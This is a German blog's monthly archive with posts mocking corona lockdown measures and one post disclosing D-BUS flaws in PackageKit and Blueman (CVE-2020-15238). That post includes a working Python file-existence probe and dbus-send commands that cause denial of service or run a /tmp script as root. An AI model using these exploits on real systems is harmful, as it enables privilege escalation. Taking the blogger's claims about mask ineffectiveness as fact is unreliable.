Monthly Archives: Oktober 2020

CoronaChroniken: Was geht da in Frankreich ab?

Posted on by

Liebe Maskierte,

da auch Ihr bald wieder kaserniert werdet, obwohl bei uns eigentlich nichts spannendes passiert ( Neuinfektionszahl wieder ein bisschen gestiegen ), schauen wir uns doch mal unseren Nachbarn Frankreich an.

CoronaChroniken: Was geht da in Frankreich ab?

Vor 2 Tagen hatte ich ja noch eine leichte Entspannung im Graphen drin, die ist aber mit den Nachkorrekturen der Neuinfektionszahlen für Deutschland dann, wie befürchtet, verschwunden. Damit ist der Trend bei uns auch weiter „Aufwärts immer, Abwärts nimmer!“, also genau das was man am Anfang der Winterzeit erwarten würde.

Die Franzosen dürfen ab heute nur noch für eine Stunde am Tag zum Sport nach draußen und benötigen selbst zum Spazierengehen, Einkaufen oder den Arztbesuch einen Passierschein ( A38 vermutlich ). Örtlich ist man auf einen Radius vom 1km um den Wohnort beschränkt. Alle entbehrlichen Firmen werden geschlossen, komischerweise bleiben die Schulen offen. Die Maßnahme ist bislang bis zum 1.Dezember befristet.

Die Neuinfektionen lagen in Frankreich zuletzt bei 46.500 Neuinfizierten am Tag. Das ist schon eine Hausnummer die schnell noch größeres erwarten lässt. Frankreich hält für uns alle aber eine Überraschung parat:

(C) EuroMOMO.eu

Genau wie Berlin, liegt die Sterblichkeit in Frankreich am unteren Grenzwert wenn nicht sogar im Bereich der Untersterblichkeit. Wer da mal sein Bundesland sehen möchte, schreibe bitte seine Gesundheitsministerin oder Minister an, auf daß dieser die Zahlen an EuroMOMO ( empfohlen vom RKI übrigens ) melden solle. Ich habe das getan. Warum das nicht das Bundesamt für Statistik macht, verstehe ich auch nicht. Ist das etwa ein Staatsgeheimnis, wieviele Menschen hier so sterben? Ich denke nicht.

Was jetzt?

Auf der Bundespressekonferenz gestern waren Mediziner von den größten Kliniken aus Nord/Ost/Süd/West vertreten und haben ein bisschen den aktuellen Stand bei Ihnen erklärt. Das größte Problem derzeit sind nicht die fehlen Betten, sondern die fehlenden Pfleger, denn freie Betten gäbe aktuell auf dem Papier jede Menge. Wenn man aber kein Pflegepersonal hat, nutzt das nichts. Als, ich kann es nicht anders nennen, Verzweiflungstat würde ich den Vorschlag werten, doch alle geplanten Operationen abzusagen und die OP-Kräfte an die Betten zu schicken. Das mag für eine Hüftop noch gehen, aber spätestens bei Krebsops wird das problematisch.

Da muß man jetzt die Politik mal fragen: Was habt Ihr eigentlich die letzten 6 Monate gemacht, außer den Teufel an die Wand zu malen? Wo sind die 6 Monate lang ausgebildeten Hilfspflegekräfte, die man jetzt bald bräuchte? Es gab ja schliesslich genug Soloselbstständige, Künstler und andere arbeitslose Menschen, die sicher nicht nein gesagt hätten. Die Kliniken haben Ihre Hausaufgaben gemacht und sich umstrukturiert und damit Ihre Bettenkapazitäten hochgeschraubt. Jetzt fehlen Pfleger und das ja nicht erst seit gestern.  Ich denke, man nennt es Politikversagen. Da ruf ich natürlich auch lieber nach mehr nutzlosen Maßnahmen, als daß ich mein langjähriges Versagen zugeben würde.

Es ist ja auch viel wichtiger, ob man das jetzt „Pfleger und Pflegerinnen“ oder „Pfleger:innen“ oder „Pfleger*nnen“ nennt. An so etwas geilen sich Leute auf, die keine existierenden Probleme lösen wollen, sondern nur heiße:re Luft von sich geben möchten. Wer sich angesprochen fühlt, weiß, daß in ihrem oder seinem Leben etwas schief läuft. Geht Probleme an, die Menschen direkt helfen: Umweltverschmutzung durch Plastik z.b. Ein Beschluss „Lebensmittel kommen nicht mehr mit Plastik in Kontakt“ und die Sache erledigt sich quasi von alleine. Eine weitere große Hilfe wäre so etwas „Auf Lebensmittels, die in gleicher oder besserer Qualität vorort angebaut werden können (Knoblauch z.b. )  gibt es einen entfernungsabhängigen Umweltverschmutzungszoll. Nichts mehr mit Subventionen, sondern Strafen wären die Folge. Das erspart uns dann den sehr fragwürdigen Chinesischen Bio-Knoblauch, statt des deutschen Knoblauchs, den es zwar gibt, der aber mehr Geld kostet, weil der Bauer auch seine Rechnungen bezahlen können muß.

Zurück zu uns

Wer hat sich im Supermarkt, in einer Gaststätte, in einem Restaurant, bei C&A mit Corona angesteckt? Dachte ich mir. Wieso machen wir dann das, was wir derzeit tun? Weil einige wenige Ausnahmen reichen um den Bias ins falsche Licht zu rücken. Mir tun die Gastronomen und Kleinkünstler echt leid, die meisten reißen sich den Arsch auf, machen früh auf und spät zu, erfüllen die Auflagen und sind jetzt wieder die Gelackmeierten. Weniger Verständnis habe ich für Helge Schneider, der Herrn Scholz empfohlen hat einen Jahresdurchschnitt zu erstatten, statt den Vorjahresmonat als Basis heranzuziehen, weil er ja letzten November nichts verdient hätte.

Was wirklich ein nachvollziehbares Problem in der Gastro ist, sind die wenigen (Berliner) Szenelokale, in denen man nicht mal aufs Klo kommt, weil die so derbe voll sind. Diese Ausnahmen sind es, die den anderen die Probleme bereiten und den „Möchtegern-Oberharter-Hund“-Politikern in die Hände spielen. Unseriöse, zum Glück amtslose, Vertreter des Public-Health-Management-Sektors fordern dann auch mal, daß die Polizei in Wohnungen kontrollieren sollte, wenn da mehr als 2 Leute am Fenster rumschleichen. Es gehören immer noch zwei Dinge dazu Herr L.: eine Person, die anstecken kann, und Personen die angesteckt werden können, die wieder zu einem Grad infektiös werden, um erneut als die eine Person zu gelten.

Um den Abschluß mit Frankreich zu bekommen, was ist an einem Bewegungsradius so hilfreich? Es spielt doch nur eine Rolle, wievielen Menschen ich begegnen könnte, und nicht wo das dann genau ist. Außer natürlich, man möchte irgendwann mal die Stadtviertel abschotten können, dann wäre es hilfreich, wenn die Betroffenen alle am selben Ort wären. Das könnt Ihr Euch noch drauf freuen, was da kommen könnte.

 

 

D-BUS: Schwachstellen mit Blueman und PackageKit

Posted on by

Da weiß man gar nicht, wie man anfangen soll, aber .. am Anfang war … D-BUS 🙂  Im neuen Ubuntu 20 … UPDATE: FEDORA 31 & 32 AUCH BETROFFEN …  wurden einige Sicherheitslücken gefunden, mit denen sich u.A. Dateien von Root finden lassen, auf die der Angreifer so gar nicht zugreifen könnte. Ob sich das nur auf Ubuntu bezieht, wird man sehen müssen.

D-BUS: Schwachstellen mit Blueman und PackageKit

Eine Information Disclosure Schwachstelle gibt es im Umgang mit D-BUS und PackageKit, so daß man als normaler angemeldeter Benutzer die Existenz von Dateien prüfen kann, die eigentlich nur Root überhaupt sehen könnte, bspw. alles was im /root/ Directory drin ist:

import dbus

bus = dbus.SystemBus()

apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit")  

trans = apt_dbus_interface.CreateTransaction()

apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction")

apt_trans_dbus_interface.InstallFiles(0, ["/root/.bashrc"])

Möglich macht das eine mangelnde Prüfung, ob der User überhaupt autorisiert ist, diese Anfrage stellen zu dürfen.Es stellt sich raus, Fedora 31 und 32 sind auch von der Schwachstelle betroffen und so sieht das dann aus:

$ python3 ./d-bus-packagekit.py
Traceback (most recent call last):
File „./d-bus-packagekit.py“, line 13, in <module>
apt_trans_dbus_interface.InstallFiles(0, [„/root/.bashrc“])
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 70, in __call__
return self._proxy_method(*args, **keywords)
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 145, in __call__
**keywords)
File „/usr/lib64/python3.7/site-packages/dbus/connection.py“, line 651, in call_blocking
message, timeout)
dbus.exceptions.DBusException: org.freedesktop.PackageKit.Transaction.MimeTypeNotSupported: MIME type ‚text/plain‘ not supported /root/.bashrc

Das ist die Antwort für eine Datei, die vorhanden ist. Nachfolgend der gleiche Ablauf für eine Datei, die nicht vorhanden ist:

$ python3 ./d-bus-packagekit.py
Traceback (most recent call last):
File „./d-bus-packagekit.py“, line 13, in <module>
apt_trans_dbus_interface.InstallFiles(0, [„/root/.bashrc333“])
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 70, in __call__
return self._proxy_method(*args, **keywords)
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 145, in __call__
**keywords)
File „/usr/lib64/python3.7/site-packages/dbus/connection.py“, line 651, in call_blocking
message, timeout)
dbus.exceptions.DBusException: org.freedesktop.PackageKit.Transaction.NoSuchFile: No such file /root/.bashrc333

Beurteilung:

  • – Man muß auf dem System als Benutzer angemeldet sein.
  • – Man muß sich mühseelig jede Datei einzeln vornehmen, was sich etwas automatisieren läßt, also schon wissen, was man sucht.
    – Man kann nicht auf den Inhalt schliessen.
  • – Es läßt sich so aber einfach feststellen, ob bestimmte Software installiert ist.

Ich halte die Lücke für nicht ganz so gravierend, man sollte sie aber schliessen. Bugreport an Fedora ist raus.

Blueman Local Privilege Escalation or Denial of Service (CVE-2020-15238)

Die Blueman Lücke ist deutlich schlimmer, da man darüber Befehle ausführen kann. Das läßt sich zudem trivial ausnutzen:

dbus-send --print-reply --system \
  --dest=org.blueman.Mechanism \
  /org/blueman/mechanism \
  org.blueman.Mechanism.DhcpClient \
  string:"ens33 down"

ens33 ist das Netzwerkinterface. Funktionieren tut das aber nur dann, wenn auch der dhcpcd installiert ist, was nicht zwangsweise so sein muß. Der Fedora Default ist der dh_client, der so scharf kontrolliert, was man ihm da über den D-BUS übergibt, daß man diese Lücke nur für einen DOS, aber nicht für die Local Privilege Escalation Attacke ausnutzen kann. Die würde so funktionieren:

dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"-c/tmp/bashscript"

Also vorher ein Script anlegen, daß root dann ausführen darf => GGS .. Ganz Große Scheiße!

Wenn Ihr also Blueman und Ubuntu 20 benutzt, dann sorgt doch mal für ein paar Updates auf Eurem System 😉

 

 

CoronaChroniken: LOCKDOWN AB MONTAG!

Posted on by

BRANDAKTUELLE MELDUNG: LOCKDOWN AB MONTAG!

Wie Bild aus der Telefonkonferenz der Regierung erfahren haben will, soll ab Montag 2.11. der Lockdown kommen.

Wenn Betriebe geschlossen werden, sollen diese bis zu 75% Ihres Umsatzes aus dem Vorjahresmonat aus dem Staatssäckel bekommen, OHNE PRÜFUNG! Herr Scholz rechnet mit 7-10 Milliarden Euro pro Monat Lockdown!

Und das Angesichts dieser eigentlich Meldung heute:

Liebe Maskierte,

die Stadt Braunschweig war mal so frei ein Gebiet zu definieren, in dessen Grenzen man eine MNB tragen muß, da sonst eine Ordnungsstrafe von 25.000 € droht, auch wenn man nicht krank ist, oder nicht mehr krank werden kann. Wer sich da tagesaktuell informieren will, findet das PDF hier: braunschweig.de / 2020-10-28_allgemeinverfuegung_mund-nasen-bedeckung_innenstadt

CoronaChroniken: ups, Neuinfektionen rückläufig?

Aus Sicht der reinen Zahlen kann Anfang der Woche ein erfreulicher Abwärtstrend erkannt werden. Da wir wegen des Meldeverzugs erst grobe Zahlen haben, kann sich dies natürlich jederzeit ändern:

Die Sterbefälle werden dann die Tage nachgereicht, wenn Sie verfügbar sind. Einen Wert konnte ich schon aufschnappen, daher der rote Sprung auf 25.

In deren Nachrichten

Die Polizei Braunschweig zeigt sich mit den Corona-Sperrstundenkontrollen sehr zufrieden, wird aber daran keine Freude finden, wenn das Beispiel als Osnabrück Schule macht:

26.10.2020 – Gericht kippt Sperrstunde Osnabruecker – Gastronom darf oeffnen

Per se ist halt nichts ein (neudeutsch) Corona-Spreading-Event, dies hält allerdings keinen auf. Im Landkreis Peine ist es schon soweit, daß die Mitarbeiter von kleinen Firmen auf dem Dorfe, bei der Arbeit eine Maske tragen sollen, wenn mehr als eine Person im Zimmer ist.

Erneuter Lockdown ab Montag

Mir ist jetzt schon klar, was in den nächsten Tagen so alles ablaufen wird. Im Spiel „Wer fordert die nächst schärfere Maßnahme“ liegt die Bundesregierung jetzt einen Punkt vorn, das kann Herr Söder natürlich nicht auf sich sitzen lassen und wird knallhart nachziehen. Das der Beschluss kommt, wo gerade ein Abwärtstrend begonnen hat, paßt irgendwie ins Bild. Die wirkungslose Maskenpflicht kam ja auch erst, als der Abwärtstrend im April schon eingesetzt hatte! Töööörö!

Das RKI betont ja immer, daß diese Graphen das Geschehen 1-2 Wochen vorher wiederspiegeln, wenn dem so ist, dann kommt dieser Lockdown 2 Wochen zu spät. Dies wird natürlich niemanden davon abhalten später laut zu brüllen, daß es ja nur diesem knallharten Event zu verdanken war, daß die Zahlen dann zurück gingen. Noch habt Ihr ja die Freiheit, das zu glauben, oder es sein zu lassen.

Aus Israel kam neulich von einem Philosophen der Gedanke, daß man ja später den Leuten das Messer auf die Brust setzen kann: „Endweder Ihr seid für einen Überwachungsstaat, der all Eure Kontakte im Namen der Infektionsbekämpfung verfolgt und übermittelt, oder Ihr werden im Lockdown halt arbeitslos.“  Wie würdet Ihr Euch da entscheiden?

Das es da mehr als die zwei Optionen gibt, steht natürlich nicht in dem Planspiel. Die naheliegenste Option kann man gerade in Italien erleben, da gibt es derzeit Straßenschlachten mit der Polizei gegen die Corona-Maßnahmen der Regierung. Aus so einer flächendeckenden Straßenschlacht wird dann schnell mal eine Revolution, welche im Übrigen jetzt bereits von der Aluhutfraktion gefordert wird. Da sollte man als Regierung jetzt deutlich mehr Hirn in seine Entscheidungen investieren, finde ich.